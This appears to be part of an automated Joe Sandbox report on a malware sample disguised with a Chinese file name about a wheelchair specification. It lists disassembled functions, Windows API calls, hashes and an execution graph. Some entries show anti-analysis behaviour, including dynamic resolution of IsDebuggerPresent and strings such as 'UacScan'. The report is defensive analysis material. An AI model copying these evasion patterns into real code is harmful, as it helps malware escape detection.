                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859C5
                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859D7
                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859E3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000), ref: 02985A17
                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8), ref: 02985A23
                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameA$kernel32.dll
                                                                              • API String ID: 3245196872-3214324292
                                                                              • Opcode ID: d5c6c096ada0bef6aa961d42d8e7cf7cf83a24e082774cce0151c7f63cc17bca
                                                                              • Instruction ID: 0c47f4611811b6e566ec98176932c41ed32b6f0839b5c28dcdd725994f390f30
                                                                              • Opcode Fuzzy Hash: d5c6c096ada0bef6aa961d42d8e7cf7cf83a24e082774cce0151c7f63cc17bca
                                                                              • Instruction Fuzzy Hash: 76F03175A00709EBDF10EAE8CC849EEB3BCFB48710F8A4596A124D7140D770DA08CF54
                                                                              Function 0298A9E0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(?,00000000,0298AA77,?,?,00000000), ref: 0298A9F8
                                                                                • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0298AA77,?,?,00000000), ref: 0298AA28
                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A92C,00000000,00000000,00000004), ref: 0298AA33
                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0298AA77,?,?,00000000), ref: 0298AA51
                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A968,00000000,00000000,00000003), ref: 0298AA5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                              • String ID:
                                                                              • API String ID: 4102113445-0
                                                                              • Opcode ID: c553027b48fbc00f5d7ce340cde333abfae5f676948874b5f7f69353561e38c7
                                                                              • Instruction ID: 553be380392719a4d315601140df2a74bdf07f3689acac9ed3197b5ddf1aac2c
                                                                              • Opcode Fuzzy Hash: c553027b48fbc00f5d7ce340cde333abfae5f676948874b5f7f69353561e38c7
                                                                              • Instruction Fuzzy Hash: AA0126306402046FF301F6B4CD11F6A77AEDBC1720F590521F101AFAC0F6349E00CA64
                                                                              Function 0298AA90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(?,00000000,0298AC60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0298AABF
                                                                                • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID: eeee$ggg$yyyy
                                                                              • API String ID: 4232894706-1253427255
                                                                              • Opcode ID: c5c299788c1a117b5db3836769d3ed5aaf7a833ce00592b8c5000c52f0d4f882
                                                                              • Instruction ID: f2dc293602bb25deb4085edceaf27751dbb959b3855b55871ce19746fb46b53a
                                                                              • Opcode Fuzzy Hash: c5c299788c1a117b5db3836769d3ed5aaf7a833ce00592b8c5000c52f0d4f882
                                                                              • Instruction Fuzzy Hash: DA41C07470424A4FD711BB7988806BEB3EBEFC5200B5C592BD652D7344EA289D06CA25
                                                                              Function 0299D8C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,0299DD01,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299D8CA
                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0299D8DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                              • API String ID: 1646373207-2367923768
                                                                              • Opcode ID: 677841a8b967842e1f3b9d0e220829c77177c07b812219067bba30065da3ca4b
                                                                              • Instruction ID: 58520b1c1012d9a4f9cd39870ec0f509dc65f2764347d457be56fc9d15d7ce20
                                                                              • Opcode Fuzzy Hash: 677841a8b967842e1f3b9d0e220829c77177c07b812219067bba30065da3ca4b
                                                                              • Instruction Fuzzy Hash: EBD012B23523801EFA0036FD5CC9C1E038C8A8593AB280A21B026DA0D3E6A6C8652570
                                                                              Function 0298C404 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,029AA10B,00000000,029AA11E), ref: 0298C40A
                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0298C41B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: 03ef6ee98b92eed181fd4ca2f73090707454acbf5bef6f7c8c98c8958b577b8e
                                                                              • Instruction ID: 900723b17c401e9e59a440aa7a7973d9286e782541842b4a01f86e89d63ed1aa
                                                                              • Opcode Fuzzy Hash: 03ef6ee98b92eed181fd4ca2f73090707454acbf5bef6f7c8c98c8958b577b8e
                                                                              • Instruction Fuzzy Hash: 02D0C770A453459EF7447EBD5495A3A26DC9B98708F9C842FF0155A141D77184904FB4
                                                                              Function 0298E178 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E227
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E243
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E2BA
                                                                              • VariantClear.OLEAUT32(?), ref: 0298E2E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                              • String ID:
                                                                              • API String ID: 920484758-0
                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                              • Instruction ID: 55ebdf8f66d9795e3aa262aa869912fc4c94fc3bfca573595d0890dce04a71bc
                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                              • Instruction Fuzzy Hash: FB411C75A0022D9FCB65EB68CC90BD9B3BDAF88714F0441E5F589E7251DA30AF818F61
                                                                              Function 0298ACCC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
                                                                              • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                              • String ID:
                                                                              • API String ID: 3990497365-0
                                                                              • Opcode ID: 799f6075530c0b0080efcfae0e87e4b0b11e83c7f5523921ad342b0495984a9a
                                                                              • Instruction ID: 83043edd16eed198f4d8a76a097c85cba3b81850257fb697dc0913bb6b524222
                                                                              • Opcode Fuzzy Hash: 799f6075530c0b0080efcfae0e87e4b0b11e83c7f5523921ad342b0495984a9a
                                                                              • Instruction Fuzzy Hash: 71412D71A402589BDB21EB68CC84BDAB7FDAF48300F4804EAA548E7251EB749F848F54
                                                                              Function 0298ACCA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
                                                                              • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                              • String ID:
                                                                              • API String ID: 3990497365-0
                                                                              • Opcode ID: a6072fa102434fdf9c75bdb2d4688369011f9bf3c97d9cd05972d479d9936336
                                                                              • Instruction ID: 888fcb39b8c3eebfaec6579cf7306df5e7a26fbcb0c9da19410e99b7e0cba612
                                                                              • Opcode Fuzzy Hash: a6072fa102434fdf9c75bdb2d4688369011f9bf3c97d9cd05972d479d9936336
                                                                              • Instruction Fuzzy Hash: 9A411071A4035C9BDB21EB58CC84BDAB7FDAF48701F4804EAA648E7251EB749F848F54
                                                                              Function 02981C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 878b4e4ace729b594958bc90bdaf02c6e45dc36187309e31bc3bc9624d5e669f
                                                                              • Instruction ID: 3bb40fc858f1193d3e74cfc4cfc815396e246869138fc9e9a357e97959b13fd6
                                                                              • Opcode Fuzzy Hash: 878b4e4ace729b594958bc90bdaf02c6e45dc36187309e31bc3bc9624d5e669f
                                                                              • Instruction Fuzzy Hash: EAA1B1A77116010BD718BA7C9C843BDB3D6DBC4225F1D827EE11DCB391EB68C9538690
                                                                              Function 0298947C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0298956A), ref: 02989502
                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0298956A), ref: 02989508
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DateFormatLocaleThread
                                                                              • String ID: yyyy
                                                                              • API String ID: 3303714858-3145165042
                                                                              • Opcode ID: e436dbf712a6c4741162dbd326eaf5c979b0afee7d3629e2ad74eb6250048c6e
                                                                              • Instruction ID: 44ccbe33b2e31bb3c67f5141c5794be653274bc1a312782d3dd51cffa446f728
                                                                              • Opcode Fuzzy Hash: e436dbf712a6c4741162dbd326eaf5c979b0afee7d3629e2ad74eb6250048c6e
                                                                              • Instruction Fuzzy Hash: 00212175A042189FEB11EFA8C881ABE73F9EF49710F5900A5ED09EB340D6349E44CBA1
                                                                              Function 0299A300 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 0299A334
                                                                              • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0299A364
                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 0299A383
                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0299A38F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Read$Write
                                                                              • String ID:
                                                                              • API String ID: 3448952669-0
                                                                              • Opcode ID: 125398054db11b0a7d28bdcb38f3ec80ccab89663a3b9969c73509c4f36971dc
                                                                              • Instruction ID: e9bb0723eaa7c96bbb6bb014c798748f147d6f1ca3b34182ac5dfc2b31ff67bd
                                                                              • Opcode Fuzzy Hash: 125398054db11b0a7d28bdcb38f3ec80ccab89663a3b9969c73509c4f36971dc
                                                                              • Instruction Fuzzy Hash: A021937164121AABDF20DF6DCC81BAE77ADEF813B5F048515ED149B344EB34E9118AA0

                                                                              Execution Graph

                                                                              Execution Coverage:12.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0.7%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:23
                                                                              execution_graph 10214 40afc0 10215 40b0c7 10214->10215 10216 40afda 10214->10216 10217 40afe0 SetFilePointer 10216->10217 10218 40b00b 10216->10218 10217->10218 10219 40b017 10218->10219 10220 40a9e0 WriteFile 10218->10220 10221 40b047 10219->10221 10224 40b031 memcpy 10219->10224 10222 40b08e 10220->10222 10222->10219 10223 40b095 WriteFile 10222->10223 10283 402e57 10284 40df60 21 API calls 10283->10284 10285 402e5d 10284->10285 10286 40a494 5 API calls 10285->10286 10287 402e68 10286->10287 10296 40de20 GetLastError TlsGetValue SetLastError 10287->10296 10289 402e6e 10297 40de20 GetLastError TlsGetValue SetLastError 10289->10297 10291 402e76 10292 409b60 3 API calls 10291->10292 10293 402e81 10292->10293 10294 40de60 3 API calls 10293->10294 10295 402e90 10294->10295 10296->10289 10297->10291 7382 401000 memset GetModuleHandleW HeapCreate 7383 401044 7382->7383 7432 40ddd0 HeapCreate TlsAlloc 7383->7432 7385 401053 7435 40aa40 7385->7435 7387 40105d 7438 409ae0 HeapCreate 7387->7438 7389 40106c 7439 409609 7389->7439 7391 401071 7444 408d8e memset 7391->7444 7393 401076 7446 4053bb RtlInitializeCriticalSection 7393->7446 7395 40107b 7447 405068 7395->7447 7404 40a37a 16 API calls 7405 4010f4 7404->7405 7406 40a2e8 13 API calls 7405->7406 7407 40110f 7406->7407 7476 40db6a 7407->7476 7409 40112d 7410 405068 4 API calls 7409->7410 7411 40113d 7410->7411 7412 40a37a 16 API calls 7411->7412 7413 401148 7412->7413 7414 40a2e8 13 API calls 7413->7414 7415 401163 7414->7415 7482 4098d0 7415->7482 7417 40116f 7488 40de20 GetLastError TlsGetValue SetLastError 7417->7488 7419 401175 7489 402f41 7419->7489 7423 401186 7514 401b8f 7423->7514 7426 40119b 7621 403df3 7426->7621 7965 40e600 RtlAllocateHeap RtlAllocateHeap TlsSetValue 7432->7965 7434 40ddf7 7434->7385 7966 40d4cc RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 7435->7966 7437 40aa4e 7437->7387 7438->7389 7967 40d2f3 7439->7967 7443 409627 RtlInitializeCriticalSection 7443->7391 7445 408dbb CoInitialize 7444->7445 7445->7393 7446->7395 7977 40e0d0 7447->7977 7449 401095 GetStdHandle 7450 409d80 7449->7450 7984 409e6f 7450->7984 7453 409dab RtlAllocateHeap 7455 409e33 HeapFree 7453->7455 7457 409dce 7453->7457 7456 4010c3 7455->7456 7460 40a37a 7456->7460 7995 40d7b9 7457->7995 7461 40a383 7460->7461 7462 4010ce 7460->7462 8064 40a436 7461->8064 7471 40a2e8 RtlAllocateHeap 7462->7471 7465 40d8e6 9 API calls 7466 40a393 7465->7466 7467 40a3ae HeapFree 7466->7467 7470 40a3c0 7466->7470 7467->7467 7467->7470 7468 40a3d3 HeapFree 7468->7462 7469 40a3c7 HeapFree 7469->7468 7470->7468 7470->7469 7472 40a307 RtlAllocateHeap 7471->7472 7473 40a31c 7471->7473 7472->7473 7474 40d7b9 11 API calls 7473->7474 7475 4010e9 7474->7475 7475->7404 8071 40dcbd 7476->8071 7479 40db87 RtlAllocateHeap 7480 40dba6 memset 7479->7480 7481 40dbea 7479->7481 7480->7481 7481->7409 7483 4099f0 7482->7483 7484 4099f8 7483->7484 7485 409a1a SetUnhandledExceptionFilter 7483->7485 7486 409a01 SetUnhandledExceptionFilter 7484->7486 7487 409a0b SetUnhandledExceptionFilter 7484->7487 7485->7417 7486->7487 7487->7417 7488->7419 8077 40df60 7489->8077 7493 402f56 8091 40de20 GetLastError TlsGetValue SetLastError 7493->8091 7495 402fab 8092 40de20 GetLastError TlsGetValue SetLastError 7495->8092 7497 402fb3 8093 40de20 GetLastError TlsGetValue SetLastError 7497->8093 7499 402fbb 8094 40de20 GetLastError TlsGetValue SetLastError 7499->8094 7501 402fc3 8095 40d0c0 7501->8095 7505 402fde 8100 405e50 7505->8100 7507 402fe6 8110 405170 TlsGetValue 7507->8110 7509 40117c 7510 40de60 TlsGetValue 7509->7510 7511 40dea6 RtlReAllocateHeap 7510->7511 7512 40de89 RtlAllocateHeap 7510->7512 7513 40dec7 7511->7513 7512->7513 7513->7423 7515 40df60 21 API calls 7514->7515 7516 401b9e 7515->7516 8133 40de20 GetLastError TlsGetValue SetLastError 7516->8133 7518 401ba4 8134 40de20 GetLastError TlsGetValue SetLastError 7518->8134 7520 401bb6 8135 40de20 GetLastError TlsGetValue SetLastError 7520->8135 7522 401bbe 8136 409638 7522->8136 7526 401bca LoadLibraryExW 7527 4051a0 3 API calls 7526->7527 7528 401bd7 EnumResourceTypesW FreeLibrary 7527->7528 7546 401c02 7528->7546 7529 401e16 7529->7529 7530 401ca0 7531 40a436 4 API calls 7530->7531 7532 401cab 7531->7532 8144 40de20 GetLastError TlsGetValue SetLastError 7532->8144 7534 401cb1 8145 40de20 GetLastError TlsGetValue SetLastError 7534->8145 7536 401cb9 8146 40de20 GetLastError TlsGetValue SetLastError 7536->8146 7538 401cc1 8147 40de20 GetLastError TlsGetValue SetLastError 7538->8147 7540 401cc9 8148 40de20 GetLastError TlsGetValue SetLastError 7540->8148 7541 40de20 GetLastError TlsGetValue SetLastError 7541->7546 7543 401cd6 8149 40de20 GetLastError TlsGetValue SetLastError 7543->8149 7544 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7544->7546 7546->7529 7546->7530 7546->7541 7546->7544 7549 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7546->7549 7547 401cde 8150 405db0 7547->8150 7549->7546 7552 401cee 8159 40d0a0 7552->8159 7556 401cfb 7557 405e50 5 API calls 7556->7557 7558 401d03 7557->7558 7559 40de60 3 API calls 7558->7559 7560 401d0d 7559->7560 8163 40de20 GetLastError TlsGetValue SetLastError 7560->8163 7562 401d17 8164 40dfc0 7562->8164 7564 401d1f 7565 40de60 3 API calls 7564->7565 7566 401d29 7565->7566 8169 40de20 GetLastError TlsGetValue SetLastError 7566->8169 7568 401d2f 8170 40de20 GetLastError TlsGetValue SetLastError 7568->8170 7570 401d37 8171 40de20 GetLastError TlsGetValue SetLastError 7570->8171 7572 401d3f 8172 40de20 GetLastError TlsGetValue SetLastError 7572->8172 7574 401d47 7575 40d0a0 7 API calls 7574->7575 7576 401d57 7575->7576 8173 405182 TlsGetValue 7576->8173 7578 401d5c 7579 405e50 5 API calls 7578->7579 7580 401d64 7579->7580 7581 40de60 3 API calls 7580->7581 7582 401d6e 7581->7582 8174 40de20 GetLastError TlsGetValue SetLastError 7582->8174 7584 401d74 8175 40de20 GetLastError TlsGetValue SetLastError 7584->8175 7586 401d7c 8176 405ec0 7586->8176 7588 401d8c 7589 40de60 3 API calls 7588->7589 7590 401d96 7589->7590 7590->7529 8184 4097fe 7590->8184 7593 401e12 7596 40def0 HeapFree 7593->7596 7595 401db5 8190 40de20 GetLastError TlsGetValue SetLastError 7595->8190 7598 401e2b 7596->7598 7600 40def0 HeapFree 7598->7600 7599 401dbd 8191 409812 7599->8191 7602 401e34 7600->7602 7604 40def0 HeapFree 7602->7604 7605 401e3d 7604->7605 7608 40def0 HeapFree 7605->7608 7607 401dce 8201 405160 7607->8201 7610 401e46 7608->7610 7611 40def0 HeapFree 7610->7611 7612 40118b 7611->7612 7612->7426 7848 403001 7612->7848 7613 401dd9 7613->7593 8204 40de20 GetLastError TlsGetValue SetLastError 7613->8204 7615 401df2 8205 40de20 GetLastError TlsGetValue SetLastError 7615->8205 7617 401dfa 7618 409812 20 API calls 7617->7618 7619 401e06 7618->7619 7620 40de60 3 API calls 7619->7620 7620->7593 7622 403df9 7621->7622 7622->7622 7623 40df60 21 API calls 7622->7623 7624 403e0b 7623->7624 7626 40de20 GetLastError TlsGetValue SetLastError 7624->7626 7629 405d60 2 API calls 7624->7629 7631 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7624->7631 7638 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7624->7638 7650 403e8c 7624->7650 7625 403f0d 7628 403f8e 7625->7628 7630 40de20 GetLastError TlsGetValue SetLastError 7625->7630 7634 405d60 2 API calls 7625->7634 7645 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7625->7645 7654 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7625->7654 7626->7624 7627 40de20 GetLastError TlsGetValue SetLastError 7627->7650 7635 40de20 GetLastError TlsGetValue SetLastError 7628->7635 7637 405d60 2 API calls 7628->7637 7646 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7628->7646 7662 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7628->7662 7663 40400f 7628->7663 7629->7624 7630->7625 7631->7624 7632 405d60 2 API calls 7632->7650 7633 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7633->7650 7634->7625 7635->7628 7636 40de20 GetLastError TlsGetValue SetLastError 7636->7663 7637->7628 7638->7624 7639 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7639->7650 7641 405d60 2 API calls 7669 404090 7641->7669 7642 40de20 GetLastError TlsGetValue SetLastError 7673 404115 7642->7673 7643 4042a4 8239 40de20 GetLastError TlsGetValue SetLastError 7643->8239 7645->7625 7646->7628 7647 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7647->7669 7648 405d60 2 API calls 7648->7673 7649 4042b0 7653 40dfc0 3 API calls 7649->7653 7650->7625 7650->7627 7650->7632 7650->7633 7650->7639 7651 405d60 2 API calls 7679 40419a 7651->7679 7652 40de20 GetLastError TlsGetValue SetLastError 7682 40421f 7652->7682 7657 4042b8 7653->7657 7654->7625 7655 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7655->7663 7656 40de20 GetLastError TlsGetValue SetLastError 7656->7669 7661 40dfc0 3 API calls 7657->7661 7658 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7658->7669 7659 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7659->7679 7660 405d60 2 API calls 7660->7682 7664 4042c2 7661->7664 7662->7628 7663->7636 7663->7655 7665 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7663->7665 7663->7669 8236 405d60 7663->8236 7668 40de60 3 API calls 7664->7668 7665->7663 7666 40de20 GetLastError TlsGetValue SetLastError 7666->7679 7667 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7667->7682 7670 4042ce 7668->7670 7669->7641 7669->7647 7669->7656 7669->7658 7669->7673 8240 40de20 GetLastError TlsGetValue SetLastError 7670->8240 7671 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7671->7673 7673->7642 7673->7648 7673->7671 7675 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7673->7675 7673->7679 7674 4042d4 8241 403275 7674->8241 7675->7673 7676 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7676->7679 7677 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 7677->7682 7679->7651 7679->7659 7679->7666 7679->7676 7679->7682 7681 40de60 3 API calls 7683 4042ed 7681->7683 7682->7643 7682->7652 7682->7660 7682->7667 7682->7677 7684 4097fe 17 API calls 7683->7684 7685 4042f2 GetModuleHandleW 7684->7685 8334 40de20 GetLastError TlsGetValue SetLastError 7685->8334 7687 40430b 8335 40de20 GetLastError TlsGetValue SetLastError 7687->8335 7689 404313 8336 40de20 GetLastError TlsGetValue SetLastError 7689->8336 7691 40431b 8337 40de20 GetLastError TlsGetValue SetLastError 7691->8337 7693 404323 7694 40d0a0 7 API calls 7693->7694 7695 404335 7694->7695 8338 405182 TlsGetValue 7695->8338 7697 40433a 7698 405e50 5 API calls 7697->7698 7699 404342 7698->7699 7700 40de60 3 API calls 7699->7700 7701 40434c 7700->7701 8339 40de20 GetLastError TlsGetValue SetLastError 7701->8339 7703 404352 8340 40de20 GetLastError TlsGetValue SetLastError 7703->8340 7705 40435a 8341 40de20 GetLastError TlsGetValue SetLastError 7705->8341 7707 404362 8342 40de20 GetLastError TlsGetValue SetLastError 7707->8342 7709 40436a 7710 40d0a0 7 API calls 7709->7710 7711 40437a 7710->7711 8343 405182 TlsGetValue 7711->8343 7713 40437f 7714 405e50 5 API calls 7713->7714 7715 404387 7714->7715 7716 40de60 3 API calls 7715->7716 7717 404391 7716->7717 8344 402e9d 7717->8344 7721 4043a4 8361 4021a4 7721->8361 7724 4051a0 3 API calls 7725 4043b4 7724->7725 8477 40195b 7725->8477 7731 4043c8 8568 40358d 7731->8568 7734 40de60 3 API calls 7735 4043ee PathRemoveBackslashW 7734->7735 7736 404402 7735->7736 8696 40de20 GetLastError TlsGetValue SetLastError 7736->8696 7738 404408 8697 40de20 GetLastError TlsGetValue SetLastError 7738->8697 7740 404410 8698 402bfa 7740->8698 7744 404422 8728 405182 TlsGetValue 7744->8728 7746 40442b 8729 409860 7746->8729 7749 4051a0 3 API calls 7750 404439 7749->7750 8733 40de20 GetLastError TlsGetValue SetLastError 7750->8733 7752 404445 7753 40dfc0 3 API calls 7752->7753 7754 40444d 7753->7754 7755 40dfc0 3 API calls 7754->7755 7756 404459 7755->7756 7757 40de60 3 API calls 7756->7757 7758 404465 7757->7758 8734 40de20 GetLastError TlsGetValue SetLastError 7758->8734 7760 40446b 8735 401e55 7760->8735 7763 40de60 3 API calls 7764 404480 7763->7764 8781 403855 7764->8781 7768 404491 7769 40dfc0 3 API calls 7768->7769 7770 404499 